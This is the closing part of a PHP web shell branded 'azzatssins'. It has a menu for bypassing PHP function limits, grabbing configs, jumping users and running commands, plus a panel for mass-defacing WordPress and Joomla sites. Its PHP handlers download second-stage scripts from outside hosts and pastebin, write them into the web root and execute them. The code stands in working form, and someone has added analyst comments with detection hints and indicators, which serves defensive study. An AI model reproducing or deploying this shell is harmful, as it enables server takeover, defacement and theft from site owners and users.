[azzatssins@localhost~]# <input onkeydown="if (event.keyCode == 13) doSSH();" type="text" id="sshcmd">

</div>



<div id="sidebar" class="sidebar">



<div class="smnu" id="smnu" class="smnu">

&raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'Security Information\');doReq2(\'secinfo\');return false;">SECURITY VULNERABILITY</a></br>

&raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'System Information\');doReq2(\'sysinfo\');return false;">SYSTEM INFO</a></br>

&raquo; <a href="" onClick="$(\'#infotitle\').html(\'PHP Info\');doReq2(\'phpinfo\');return false;">PHP INFO</a></br>

&raquo; <a href="" onClick="filebrs(\'\'); return false;">FILE BROWSER</a></br>

&raquo; <a href="" onClick="$(\'#infotitle\').html(\'Scanned Domains\');doReq2(\'chknamed\');return false;">GET ALL DOMAINS</a></br>

&raquo; <a href="" onClick="doReq(\'chkph\');return false;">CMS DETECTOR [Simple]</a></br>

&raquo; <a href="" onClick="$(\'#inject\').show();doUpdt(\'chkph2\');return false;">CMS DETECTOR [Root]</a></br>

&raquo; <a href="" onClick="doReq2(\'safebypass\');return false;">BYPASS FUNCTIONS</a></br>

&raquo; <a href="" onClick="hideAll(); $(\'#sshbox\').show(); return false;">COMMAND CONSOLE</a></br>

&raquo; <a href=?symbolic=link>SYMBOLIC</a> <a href=?sym=link>LINK</a></br>

&raquo; <a href=?jumping=user>JUMPING USER</a></br>

&raquo; <a href=?config=grabber>CONFIGS GRABBER</a></br>

&raquo; <a href=?file=uploader>UPLOAD FILE</a></br>

&raquo; <a href=?whmcs=decode>WHMCS DECODE</a></br>

&raquo; <a href=?mysql=connect>MYSQL CONNECT</a></br>



</div>

<div class="stitle" onClick="sidebarz();">[+]</br>A</br>Z</br>Z</br>A</br>T</br>S</br>S</br>I</br>N</br>.</br>S</br>[+]</div>

</div>



<div id="sidebar2" class="sidebar" style="display:none;right:1px;left:auto;">

<div class="smnu" style="float:right;" id="smnu2" class="smnu">

<div id="injmain">

&raquo; <a href="" onClick="doInject(); return false;">Start Injecting</a></br>

&raquo; <a href="" onClick="">Export</a></br>

&raquo; <a href="" onClick="rmvErr(); return false;">Remove Error</a></br>

&raquo; <a href="" onClick="rmvSlct(); return false;">Remove Selected</a></br>

&raquo; <a href="" onClick="retryTimeout(); return false;">Retry timeout</a></br>

&raquo; <a href="" onClick="alert(\'Do It Manually :p\'); return false;">Submit to Zone-H</a></br>

&raquo; <a href="" onClick="$(\'#injmain\').hide(); $(\'#inj2nd\').show(); return false;">Settings</a></br>

</div>

<div id="inj2nd" style="display:none;">

<div class="rbox">



<div style="clear:both;"></div>

<center><u>WordPress</u></center><br>

<input type="checkbox" name="404_php" id="404_php" checked>404.php<br />

<input type="checkbox" name="archive_php" id="archive_php" checked>archive.php<br />

<input type="checkbox" name="index_php" id="index_php" checked>index.php<br />

<input type="checkbox" name="home_php" id="home_php" checked>home.php<br />

<input type="checkbox" name="comment_php" id="comment_php" checked>comment.php<br /><br /><br />

</div>



<div class="rbox">

<center><u>Joomla</u></center><br>

<input type="checkbox" name="use_com" id="use_com" checked>Use Com Installer<br />

<input type="checkbox" id="ignore_def">Ignore Default Templete<br />

</div>



<div class="rbox">

<center><u>Default</u></center><br>

Req/s: <input type="text" class="smit" value="10" onChange="req_limit = $(this).val();"><br />

Deface Page Link: <input type="text" class="smit" id="deface_page" value="http://wget.yu.tl/files/lol.css"><br /><br />

</div>



<div style="clear:both;"></div><br />

<a href="" onClick="$(\'#injmain\').show(); $(\'#inj2nd\').hide(); return false;">Go Back</a>

</div>





</div>

<div class="stitle" style="float:right;" onClick="sidebarz2();">A</br>Z</br>Z</br>A</br>T</br>S</br>S</br>I</br>N</br>S</div>

</div>



<div style="clear:both;"></div>



</body>

</html>';
// ?mysql=connect: fetches a second-stage script over plain HTTP from a
// hard-coded URL, writes it next to this file as mysql.php and redirects the
// browser to it. No TLS and no integrity check, so whoever controls that host
// (or the network path) decides what lands in the web root.
// Detection: outbound HTTP from the web server to that host, or a newly
// created mysql.php beside this script. The URL itself is an IoC.
if($_GET['mysql']=="connect"){
$get = file_get_contents('http://wget.yu.tl/files/mysql.css');
$bwt = fopen('mysql.php', 'w');
fwrite($bwt,$get);
fclose($bwt);
echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
}
// ?symbolic=link: same drop-and-run pattern, but the payload is written as
// symlink.py and run through system() — OS command execution under the PHP
// worker's account — then deleted, so only the redirect target "sl"
// (presumably created by that script; not visible here) remains on disk.
// Detection: a python child process spawned by the web server, or a
// short-lived symlink.py in the web root.
if($_GET['symbolic']=="link"){
$get = file_get_contents('http://x-x-x.yn.tl/py');
$bwt = fopen('symlink.py', 'w');
fwrite($bwt,$get);
fclose($bwt);
system('python symlink.py');unlink('symlink.py');
echo'<meta http-equiv="Refresh" content= "0; url=sl">';
}
// ?perl=shell: drops cgi.pl from a pastebin raw URL, marks it executable
// (0755) and redirects to it, presumably so the server runs it as CGI. This
// handler is not linked from the sidebar menu above — a hidden entry point.
// Detection: a new executable .pl in the web root, or outbound requests to
// pastebin raw URLs from the web server.
if($_GET['perl']=="shell"){
$get = file_get_contents('http://pastebin.com/raw/5trLjPyh');
$bwt = fopen('cgi.pl', 'w');
fwrite($bwt,$get);
fclose($bwt);
chmod('cgi.pl',0755);
echo'<meta http-equiv="Refresh" content= "0; url=cgi.pl">';
}
  3160. ?>